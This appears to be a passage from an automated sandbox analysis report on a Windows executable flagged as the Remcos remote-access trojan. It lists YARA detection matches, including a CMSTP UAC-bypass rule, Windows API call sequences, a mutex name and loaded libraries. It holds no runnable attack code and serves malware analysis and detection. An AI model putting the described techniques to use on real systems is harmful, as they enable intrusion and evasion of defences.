                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_0041330D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BBC6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB9A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167EF
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043706A0_2_0043706A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004140050_2_00414005
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E11C0_2_0043E11C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004541D90_2_004541D9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004381E80_2_004381E8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041F18B0_2_0041F18B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004462700_2_00446270
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E34B0_2_0043E34B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004533AB0_2_004533AB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0042742E0_2_0042742E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004375660_2_00437566
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E5A80_2_0043E5A8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004387F00_2_004387F0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043797E0_2_0043797E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004339D70_2_004339D7
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0044DA490_2_0044DA49
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00427AD70_2_00427AD7
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041DBF30_2_0041DBF3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00427C400_2_00427C40
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00437DB30_2_00437DB3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00435EEB0_2_00435EEB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043DEED0_2_0043DEED
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00426E9F0_2_00426E9F
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00402093 appears 50 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00401E65 appears 35 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00434E70 appears 54 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00434801 appears 42 times
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0041798D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F4AF
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B539
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].jsonJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\hhh-AQVE0Z
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Software\0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: hhh-AQVE0Z0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: hhh-AQVE0Z0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 0C[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 0C[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: licence0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: dMG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PSG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Administrator0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: User0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
